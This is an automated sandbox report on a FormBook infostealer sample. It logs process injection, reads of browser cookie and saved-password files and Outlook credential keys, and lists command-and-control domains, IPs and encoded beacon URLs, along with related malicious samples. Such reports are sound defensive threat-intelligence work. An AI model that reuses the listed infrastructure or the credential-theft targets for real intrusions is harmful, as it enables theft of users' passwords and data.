Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\takeown.exe

Thread register set: target process: 6208

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\takeown.exe

Thread APC queued: target process: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe

Jump to behavior

Source: C:\Users\user\Desktop\PO0423023.exe	Process created: C:\Users\user\Desktop\PO0423023.exe "C:\Users\user\Desktop\PO0423023.exe"	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	Process created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: uFKwxSqRZbIimWVtjS.exe, 00000005.00000000.2409722163.0000000001411000.00000002.00000001.00040000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000005.00000002.3262288422.0000000001411000.00000002.00000001.00040000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3262408178.0000000001B11000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: uFKwxSqRZbIimWVtjS.exe, 00000005.00000000.2409722163.0000000001411000.00000002.00000001.00040000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000005.00000002.3262288422.0000000001411000.00000002.00000001.00040000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3262408178.0000000001B11000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: uFKwxSqRZbIimWVtjS.exe, 00000005.00000000.2409722163.0000000001411000.00000002.00000001.00040000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000005.00000002.3262288422.0000000001411000.00000002.00000001.00040000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3262408178.0000000001B11000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: uFKwxSqRZbIimWVtjS.exe, 00000005.00000000.2409722163.0000000001411000.00000002.00000001.00040000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000005.00000002.3262288422.0000000001411000.00000002.00000001.00040000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3262408178.0000000001B11000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\PO0423023.exe	Queries volume information: C:\Users\user\Desktop\PO0423023.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PO0423023.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 3.2.PO0423023.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PO0423023.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3265262776.0000000005940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2489011998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3262815289.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2491778083.0000000001CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3262551392.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3262636915.0000000002A20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2491943456.0000000001DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\takeown.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\takeown.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 3.2.PO0423023.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PO0423023.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3265262776.0000000005940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2489011998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3262815289.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2491778083.0000000001CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3262551392.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3262636915.0000000002A20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2491943456.0000000001DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	412 Process Injection	1 Masquerading	1 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	412 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO0423023.exe	35%	Virustotal		Browse
PO0423023.exe	32%	ReversingLabs	ByteCode-MSIL.Trojan.Taskun
PO0423023.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
www.cd14j.us	0%	Virustotal		Browse
www.luckydomainz.shop	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	URL Reputation	safe
http://tempuri.org/DataSet1.xsd	2%	Virustotal		Browse
https://www.marksmile.com/	0%	Virustotal		Browse
http://www.cd14j.us/pq0o/	0%	Virustotal		Browse
http://www.marksmile.com/asset/lp_qrcode.png	1%	Virustotal		Browse
https://mail.365.com/login.html	0%	Virustotal		Browse
http://www.luckydomainz.shop/pq0o/	0%	Virustotal		Browse
http://www.marksmile.com/asset/lp_style.css	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.xn--yzyp76d.com	47.76.62.167	true	false		unknown
parkingpage.namecheap.com	91.195.240.19	true	false		high
www.cd14j.us	91.195.240.123	true	false	0%, Virustotal, Browse	unknown
www.fashionagencylab.com	91.195.240.117	true	false		unknown
www.luckydomainz.shop	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.fashionagencylab.com/pq0o/	false		unknown
http://www.xn--yzyp76d.com/pq0o/?Lx=8PqlJ028VT_&sHlxgpX=J8WC84xruYdLZ+88O/faPZDbDvgvpAFcdnGo6AhEflv3qioXWy6Vm5wGjKWjZFBj5bzfVwWaJCB72b3lEpkTVQZSX1dtpaRBnFtuiUAedf4oW0TmsJoC9BTZIWyKDmIsTQ==	false		unknown
http://www.cd14j.us/pq0o/?Lx=8PqlJ028VT_&sHlxgpX=zdIBKqN9oP3plxVX8thCZZdmDrHBie+/57+iRklTGjPKULzejm8MTR3zmbqN1d/mp0y1+1mzyQU/+H24oE5uBlYVorRh6rpQbOSJYQm+mXyPaQohcHNhiXaWLX+2tNk6Xw==	false		unknown
http://www.luckydomainz.shop/pq0o/?sHlxgpX=zlo+FGSBhCkM5GVOiSRgbmytEbX4vu088Yj7BD8zO0hDA+Ttp+tE7JQXtFhQSzjU/FmrV36xGrNmbpUbkD9mJUabQMjhSVlFurdcd91J2fhXl/3bZKBIsDf+Ls10KGv+Sw==&Lx=8PqlJ028VT_	true		unknown
http://www.cd14j.us/pq0o/	false	0%, Virustotal, Browse	unknown
http://www.fashionagencylab.com/pq0o/?sHlxgpX=Ed/ELXNC0S7dMHCut27L778qDXjqsr17l3BGGyc+QR+QSIsAiYGE9ikEmCd6tM+iTSJXxriNtRC8Y/iBHpE37xqgjcRlXnwEl/GWP1Z5DHGRU92yhpKCU6gPuWpCXnwQNw==&Lx=8PqlJ028VT_	false		unknown
http://www.luckydomainz.shop/pq0o/	true	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	takeown.exe, 00000006.00000002.3266159906.0000000008358000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fashionagencylab.com	uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3265262776.00000000059B8000.00000040.80000000.00040000.00000000.sdmp	false		unknown
https://duckduckgo.com/ac/?q=	takeown.exe, 00000006.00000002.3266159906.0000000008358000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mail.365.com/login.html	takeown.exe, 00000006.00000002.3263652548.00000000044C4000.00000004.10000000.00040000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3263133783.00000000038F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2804163567.000000002EEC4000.00000004.80000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.marksmile.com/	takeown.exe, 00000006.00000002.3263652548.00000000044C4000.00000004.10000000.00040000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3263133783.00000000038F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2804163567.000000002EEC4000.00000004.80000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://tempuri.org/DataSet1.xsd	PO0423023.exe	false	2%, Virustotal, Browse	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	takeown.exe, 00000006.00000002.3266159906.0000000008358000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	takeown.exe, 00000006.00000002.3266159906.0000000008358000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.namesilo.com	takeown.exe, 00000006.00000002.3263652548.00000000047E8000.00000004.10000000.00040000.00000000.sdmp, takeown.exe, 00000006.00000002.3265854734.00000000067A0000.00000004.00000800.00020000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3263133783.0000000003C18000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	takeown.exe, 00000006.00000002.3266159906.0000000008358000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	PO0423023.exe	false	URL Reputation: safe	unknown
https://www.sedo.com/services/parking.php3	uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3263133783.0000000003C18000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	takeown.exe, 00000006.00000002.3266159906.0000000008358000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.namesilo.com/domain/search-domains?query=cd14j.us	takeown.exe, 00000006.00000002.3263652548.00000000047E8000.00000004.10000000.00040000.00000000.sdmp, takeown.exe, 00000006.00000002.3265854734.00000000067A0000.00000004.00000800.00020000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3263133783.0000000003C18000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.tucowsdomains.com/	uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3263133783.0000000003DAA000.00000004.00000001.00040000.00000000.sdmp	false		high
http://www.marksmile.com/asset/lp_style.css	takeown.exe, 00000006.00000002.3263652548.00000000044C4000.00000004.10000000.00040000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3263133783.00000000038F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2804163567.000000002EEC4000.00000004.80000000.00040000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	takeown.exe, 00000006.00000002.3266159906.0000000008358000.00000004.00000020.00020000.00000000.sdmp	false		high
https://img.sedoparking.com/templates/images/hero_nc.svg	takeown.exe, 00000006.00000002.3263652548.0000000004656000.00000004.10000000.00040000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3263133783.0000000003A86000.00000004.00000001.00040000.00000000.sdmp	false		high
http://www.marksmile.com/asset/lp_qrcode.png	takeown.exe, 00000006.00000002.3263652548.00000000044C4000.00000004.10000000.00040000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3263133783.00000000038F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2804163567.000000002EEC4000.00000004.80000000.00040000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://www.namecheap.com/domains/registration/results/?domain=luckydomainz.shop	takeown.exe, 00000006.00000002.3263652548.0000000004656000.00000004.10000000.00040000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3263133783.0000000003A86000.00000004.00000001.00040000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	takeown.exe, 00000006.00000002.3266159906.0000000008358000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.195.240.117	www.fashionagencylab.com	Germany	47846	SEDO-ASDE	false
91.195.240.123	www.cd14j.us	Germany	47846	SEDO-ASDE	false
47.76.62.167	www.xn--yzyp76d.com	United States	9500	VODAFONE-TRANSIT-ASVodafoneNZLtdNZ	false
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430158
Start date and time:	2024-04-23 08:36:36 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO0423023.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@4/4
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 91% Number of executed functions: 101 Number of non-executed functions: 290
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Report creation exceeded maximum time and may have missing disassembly code information.

Simulations

Behavior and APIs

Time	Type	Description
08:37:24	API Interceptor	1x Sleep call for process: PO0423023.exe modified
08:38:50	API Interceptor	453583x Sleep call for process: takeown.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.195.240.117	PO 26519PZ F30 59.vbs	Get hash	malicious	FormBook, GuLoader	Browse	www.blueberry-breeze.com/bnz5/
	INQ No.KP-50-000-PS-IN-INQ-0027.exe	Get hash	malicious	FormBook	Browse	www.choosejungmann.com/aleu/
	PO_PDF24172024.scr.exe	Get hash	malicious	FormBook	Browse	www.myspinpods.com/bnz5/
	eInvoicing_pdf.vbs	Get hash	malicious	FormBook	Browse	www.heavydripluxury.com/avr4/
	Payment Advice for Invoice 2024 0904.vbs	Get hash	malicious	FormBook	Browse	www.heavydripluxury.com/avr4/
	2x6j7GSmbu.exe	Get hash	malicious	FormBook	Browse	www.wewear-jim.com/9upe/
	HYCO_Invoices MS2 & MS3.exe	Get hash	malicious	FormBook	Browse	www.avoshield.com/aleu/
	RFQ.exe	Get hash	malicious	FormBook	Browse	www.blueberry-breeze.com/bnz5/
	HSBC Advice_pdf.vbs	Get hash	malicious	FormBook	Browse	www.heavydripluxury.com/avr4/
	BL4567GH67_xls.exe	Get hash	malicious	FormBook	Browse	www.thegoldengirlsshop.com/n8t5/
91.195.240.123	2x6j7GSmbu.exe	Get hash	malicious	FormBook	Browse	www.oq5o6u.us/9upe/
	BL4567GH67_xls.exe	Get hash	malicious	FormBook	Browse	www.qpdkg.lat/n8t5/
	5AmzSYESuY.exe	Get hash	malicious	FormBook	Browse	www.theluckypaddle.net/kh11/?sp=pEnoyLbB8R2ToRdttB3I7kzFJY2mhizc4gkM7DsureRNB8KuNwcW8JBDtq429pXJBUYB&SP=cnxh5xAH
	0wD4IaXvQH.exe	Get hash	malicious	FormBook	Browse	www.wocan92.top/kh11/?ExlpdH=1SyeG5UxQaNYmPlCsF3Jxo2cHASRWxZA4zW8WbIseYgPwE2bO9hSxAVmxZKC97PVduda&anx=TXFXCVdxMl5ty
	8C3H9zQgK2.exe	Get hash	malicious	FormBook	Browse	www.theluckypaddle.net/kh11/?9r=pEnoyLbB8R2ToRdttB3I7kzFJY2mhizc4gkM7DsureRNB8KuNwcW8JBDtpYp2JHxbzlL&yT=H0GxcDi
	Scan Document Copy_docx.exe	Get hash	malicious	FormBook	Browse	www.qpdkg.lat/n8t5/
	SecuriteInfo.com.W32.AutoIt.IJ.gen.Eldorado.2874.1070.exe	Get hash	malicious	FormBook	Browse	www.theluckypaddle.net/kh11/?02M=pEnoyLa18xzj1hAZxx3I7kzFJY2mhizc4gkM7DsureRNB8KuNwcW8JBDtpYMt43xbz5G&EVdL=KndHBxqXqV
	0ekwLomWKo.exe	Get hash	malicious	FormBook	Browse	www.uc9d1.us/g0dh/
	ungziped_file.exe	Get hash	malicious	FormBook	Browse	www.qpdkg.lat/n8t5/
	JyQot38Rgt.exe	Get hash	malicious	FormBook	Browse	www.2023082635-stripe.com/ki21/?RL0=B/b4oqc4ryQeYG3UK95YghGUsItV//4AcBVApS1jm6se/zIHPPQVrltBuhRyKuZ6vgVd&BRAdbN=7nGxoRnH2VDLbbtp
91.195.240.19	INQ No.KP-50-000-PS-IN-INQ-0027.exe	Get hash	malicious	FormBook	Browse	www.solesense.pro/aleu/
	Ordine_doc_419024001904.bat	Get hash	malicious	FormBook, GuLoader	Browse	www.oyoing.com/gnbc/
	PO_La-Tanerie04180240124.vbs	Get hash	malicious	FormBook, GuLoader	Browse	www.megabet303.lol/gnbc/
	PO_La-Tanerie04180240124.bat	Get hash	malicious	FormBook, GuLoader	Browse	www.megabet303.lol/gnbc/
	NEW-ORDER_pdf.exe	Get hash	malicious	FormBook	Browse	www.primeplay88.org/ufuh/
	202404153836038.EXE.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.stevethatcher.com/9pdo/
	PO# ROSIT#U00a0MR2309040.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.lucathicke.com/6iog/
	alhadani Aprilorders140424.scr.exe	Get hash	malicious	FormBook	Browse	www.primeplay88.org/ufuh/
	Swift Message.pdf.exe	Get hash	malicious	FormBook	Browse	www.daresmaes.com/cga5/
	MT103 Remittance.vbs	Get hash	malicious	FormBook	Browse	www.speakgeni.us/m07a/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
parkingpage.namecheap.com	INQ No.KP-50-000-PS-IN-INQ-0027.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	Ordine_doc_419024001904.bat	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	PO_La-Tanerie04180240124.vbs	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	PO_La-Tanerie04180240124.bat	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	Arrival Notice.vbs	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	NEW-ORDER_pdf.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	202404153836038.EXE.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	PO# ROSIT#U00a0MR2309040.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	alhadani Aprilorders140424.scr.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	Arrival Notice.vbs	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SEDO-ASDE	PO 26519PZ F30 59.vbs	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.117
	INQ No.KP-50-000-PS-IN-INQ-0027.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	PO_PDF24172024.scr.exe	Get hash	malicious	FormBook	Browse	91.195.240.117
	Ordine_doc_419024001904.bat	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	eInvoicing_pdf.vbs	Get hash	malicious	FormBook	Browse	91.195.240.117
	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	PO_La-Tanerie04180240124.vbs	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	PO_La-Tanerie04180240124.bat	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
VODAFONE-TRANSIT-ASVodafoneNZLtdNZ	https://47.76.175.241/	Get hash	malicious	Unknown	Browse	47.76.175.241
	FE8sC55u4j.elf	Get hash	malicious	Mirai	Browse	121.75.97.113
	SecuriteInfo.com.Trojan.KillProc2.23108.29569.31585.exe	Get hash	malicious	Unknown	Browse	47.79.64.164
	9IseFevRH6.elf	Get hash	malicious	Mirai	Browse	121.75.50.158
	MY69DoYgp5.elf	Get hash	malicious	Mirai	Browse	118.93.122.127
	x86.elf	Get hash	malicious	Mirai	Browse	47.72.174.93
	ksoanz#U8be6#U7ec6_6044.exe	Get hash	malicious	Unknown	Browse	47.76.232.8
	HmBC8e0eux.elf	Get hash	malicious	Unknown	Browse	121.74.237.252
	M0akqPlgtl.elf	Get hash	malicious	Mirai	Browse	47.72.198.83
	uvaXiyELu9.elf	Get hash	malicious	Mirai	Browse	27.252.192.87
SEDO-ASDE	PO 26519PZ F30 59.vbs	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.117
	INQ No.KP-50-000-PS-IN-INQ-0027.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	PO_PDF24172024.scr.exe	Get hash	malicious	FormBook	Browse	91.195.240.117
	Ordine_doc_419024001904.bat	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	eInvoicing_pdf.vbs	Get hash	malicious	FormBook	Browse	91.195.240.117
	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	PO_La-Tanerie04180240124.vbs	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	PO_La-Tanerie04180240124.bat	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
SEDO-ASDE	PO 26519PZ F30 59.vbs	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.117
	INQ No.KP-50-000-PS-IN-INQ-0027.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	PO_PDF24172024.scr.exe	Get hash	malicious	FormBook	Browse	91.195.240.117
